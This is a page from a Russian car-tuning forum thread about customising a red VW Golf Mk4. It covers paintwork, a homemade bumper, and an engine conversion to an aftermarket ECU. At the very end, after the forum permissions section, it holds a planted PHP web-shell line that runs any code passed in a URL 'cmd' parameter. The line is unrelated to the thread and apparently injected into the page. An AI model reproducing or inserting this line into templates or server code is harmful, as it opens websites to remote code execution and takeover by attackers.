+ Ответить в теме
Страница 2 из 8 ПерваяПервая 1 2 3 4 ... ПоследняяПоследняя
Показано с 11 по 20 из 77

Тема: project "Red Zone"


  1. #11
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Выглядит замечательно ! )))) уже тепло хочется ведь уже покататься
    песок сыпется....не останавливайтесь на достигнутом !

  2. #12
    Серега молодчик !!!

  3. #13
    GTI-Racing Student112 is on a distinguished road Аватар для Student112
    Регистрация
    23.09.2008
    Откуда
    Дубна М.О.-Кострома
    Машина
    Bolf Mk4 1.4Turbo
    Сообщений
    165
    да покататься оч сильно хочется)))
    спасиб)
    VW Bolf 4 /1.4AKQ Turbo(0.8 bar) 197.6 Hp-Январь 5.1 -ПРОДАН/1.8BigTurbo+4motoin-в процессе/ Red / Coil-over RACELAND/17" Volk Racing SE37/312 тормоза/ и еще много чего впереди)) Кострома-М.О. Дубна

  4. #14
    One more RUM PA PA PA RUM PUM - and the drummer boy dies Dio is a jewel in the rough Dio is a jewel in the rough Dio is a jewel in the rough Dio is a jewel in the rough Аватар для Dio
    Регистрация
    17.08.2010
    Откуда
    Москва, СВАО
    Машина
    BMW X1 xDrive 20i SportLine
    Сообщений
    1,424
    Цвет супер!

  5. #15
    GTI-Racing Student112 is on a distinguished road Аватар для Student112
    Регистрация
    23.09.2008
    Откуда
    Дубна М.О.-Кострома
    Машина
    Bolf Mk4 1.4Turbo
    Сообщений
    165
    в пятницу вышкурили гольфа(лак заматовали) и облили двери,крылья,бампера, вчера забрал их,вчера же облили кузов в итоге лака ушло 6 литров! и смотрится как-будьто под стеклом,цвет вобщем получился что надо оч круто блестит и переливается под разными углами обзора)я пол дня вчера смотрел не мог насмотреться,сейчас поеду гофа забирать)
    фотке:



    VW Bolf 4 /1.4AKQ Turbo(0.8 bar) 197.6 Hp-Январь 5.1 -ПРОДАН/1.8BigTurbo+4motoin-в процессе/ Red / Coil-over RACELAND/17" Volk Racing SE37/312 тормоза/ и еще много чего впереди)) Кострома-М.О. Дубна

  6. #16
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    какой то нереальный цвет !
    песок сыпется....не останавливайтесь на достигнутом !

  7. #17
    GTI-Racing Student112 is on a distinguished road Аватар для Student112
    Регистрация
    23.09.2008
    Откуда
    Дубна М.О.-Кострома
    Машина
    Bolf Mk4 1.4Turbo
    Сообщений
    165
    Цитата Сообщение от BON Посмотреть сообщение
    какой то нереальный цвет !
    ну почему же нереальный вполне реальный)))
    VW Bolf 4 /1.4AKQ Turbo(0.8 bar) 197.6 Hp-Январь 5.1 -ПРОДАН/1.8BigTurbo+4motoin-в процессе/ Red / Coil-over RACELAND/17" Volk Racing SE37/312 тормоза/ и еще много чего впереди)) Кострома-М.О. Дубна

  8. #18
    GTI-Racing Student112 is on a distinguished road Аватар для Student112
    Регистрация
    23.09.2008
    Откуда
    Дубна М.О.-Кострома
    Машина
    Bolf Mk4 1.4Turbo
    Сообщений
    165
    немного пофоткал)




    капот еще недоделал все никак времени нету,салон также несобран,вины неопущены,успел тока колеса летние накинуть,после екзотики буду их перекрашивать чтоб окантовка была в цвет + черный металлик,ну и после екзотики планирую заняться прикручиванием января.
    VW Bolf 4 /1.4AKQ Turbo(0.8 bar) 197.6 Hp-Январь 5.1 -ПРОДАН/1.8BigTurbo+4motoin-в процессе/ Red / Coil-over RACELAND/17" Volk Racing SE37/312 тормоза/ и еще много чего впереди)) Кострома-М.О. Дубна

  9. #19
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    цвет огонь !
    песок сыпется....не останавливайтесь на достигнутом !

  10. #20
    GTI-Racing Student112 is on a distinguished road Аватар для Student112
    Регистрация
    23.09.2008
    Откуда
    Дубна М.О.-Кострома
    Машина
    Bolf Mk4 1.4Turbo
    Сообщений
    165

    инварь инсайд)))

    Давно тут ничего необновлял, все никак небыло времени то работал все лето без выходных целыми днями, то кто нить приедет с просьбами починить машину ,в ноябре начала посылать всех куда подальше в том числе и работу и начал наконецто заниматся гольфом.
    начну с того что в сентябре как то освободился с работы часиков в 9 вечера решил зайти в гараж помыть гольфа и так проткатися тока помыл и тут бац мне прям у гаража вьехали в задний бампер

    того кто ето сделал чуть было на месте неубил чел завел машину на передаче и вьехал в меня в итоге оформили все и в страховую,виновник оказалось застрахован тамже где и я,через пару дней гольфа посмотрели и сразу сказали скока возместят чесно говоря я был в шоке что мне стока насчитали ( а насчитали реально немало учитывая предыддущие страховые случаи там платили совсем копейки).Бампер начал потихоньку делать вырезал нишу под номер терь он будет в штатном месте,но так пока и недоделал.
    Поскольку заплатили больше чем я ожидал я решил что надо менять передний бампер и тут увидел случайно что чел отдает почти за даром бампер эРочный на гольфовскую морду чутка треснутый,я решил его взять

    и начал потихоньку эти 2 бампера скрещивать,тока значит распили их разметил и тут в гаражах отключают электричество на 3 недели соотвествено 3 недели непоявлялся в гараже,потом все таки спаял за пару вечеров бампера получилось оч даже неплохо

    стык уже зашпаклевал и ввышкурил надо тока загрунтовать
    также прикупил оригинальные решетки в этот бампер и губу от купры р.
    далее начал заниматся мотором а именно прехродом на январь.
    сначала снял свои шкивы купил шкив с репперным диском от 16кл проточил его у токаря

    вставил в свой(предварительно примерно продумав где будет дпкв) потом отдал сварщику на обварку аргоном

    затем решил оба шкива соединить хорошенько и сделал отверстия с резбой в шкиве грм чтоб шктив с репперным диском прикручивался к шкиву грм болтами.

    начал делать крепление дпкв и тут снова отулючают электричесво в гаражах на 2 недели,продождав неделю купил себе большой аккумуляторный фонарь и сним лазил в яме примеря раз по 10 крепелние и подпиливая его 2 вечераи на работе все обварил.
    фотки чета так и ненашел сфоткаю покажу )
    затем все собрал выставил метки и разметил на р/в место где надо вкрутить шпильку под дф,спилил штатные шторки,просвелил отверстие нарезал резьбу и врутил шпильку

    затем снял коллектор т к у первого и4го цилинра по краям подсекало стенки оч тонкие оказались и их чутка повело
    токарь выточил новый фланец уже 12 мм и прямоугольный не по прокладке,у соседа обварили все это аргоном,потом распилил фланец что меньше вело и к токарю на фрезеровку убрал все ступеньки каменными шарожками,обмотал его и поставил.

    прикрутил новую турбину ибо старая масло гнала неслабо

    затем на работе выточил проставку алюминевую под датчик температуры

    сделал новый слив масла с турбы и перенес датчик тепературы масла в поддон(хорошо что у соседа в гараже есть аргонная сварка )

    потом начал примерять впускной коллектор и чета он мне тут непонравился раcпилил его и уменьшил в обьеме
    также понадобилась новая топливная рампа тк родная с сабовскими форсами невлазила в коллектор,сьздил к токарю быстренько выточили втулки под форсы,потом к соседу в гараж приварили все это,на работе выточил фланец под рдт вазовский и 2 штуцера(тонкая трубка на фото я ее приварил к фланцу рдт и вставил в рампу те она оказалась внутри рампы) потом на работе все обварили

    затем все отпескоструил(ктсте на фото фидно как раз коллектор впускной переделанный)

    потом все покрасил и начал прикручивать собрал все в восресенье подключил быстрентко январь а именно дпкв,дроссель и питание на мозги форсы пока поставил стоковые и уже поздно вечером наконецто завелся радости небыло предела,

    видео запуска
    http://www.youtube.com/watch?v=F0UlJ...F8JDojoN6GVMKA
    правда первый раз мотор сам заглох и загорелось давление масла я чета непонял как потом оказалось
    штатные мозги насос отрубают невидя что мотор работает,потом заводил все норм было тока работал недолго надо насос подключить к январю, на днях как будет время разберусь с этим уложу проводку и надо уже будет выезжать,правда чтобы выехать надо тормоза собрать тк свои я продал а большие пока непоставил не до них пока, но об этом чуть позже напишу))
    VW Bolf 4 /1.4AKQ Turbo(0.8 bar) 197.6 Hp-Январь 5.1 -ПРОДАН/1.8BigTurbo+4motoin-в процессе/ Red / Coil-over RACELAND/17" Volk Racing SE37/312 тормоза/ и еще много чего впереди)) Кострома-М.О. Дубна

+ Ответить в теме
Страница 2 из 8 ПерваяПервая 1 2 3 4 ... ПоследняяПоследняя

Похожие темы

  1. Ответов: 3
    Последнее сообщение: 02.04.2024, 06:45
  2. "I этап Кубка "МАГИСТРАЛЬ 2012" - 17 марта"
    от Magistral в разделе Туризм и отдых
    Ответов: 3
    Последнее сообщение: 02.04.2024, 03:58
  3. Ответов: 2
    Последнее сообщение: 02.04.2024, 01:56
  4. Интеркуллер "Мокрый" или "Сухой"??? Хелп???
    от Танкист в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 10
    Последнее сообщение: 17.11.2009, 20:45

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}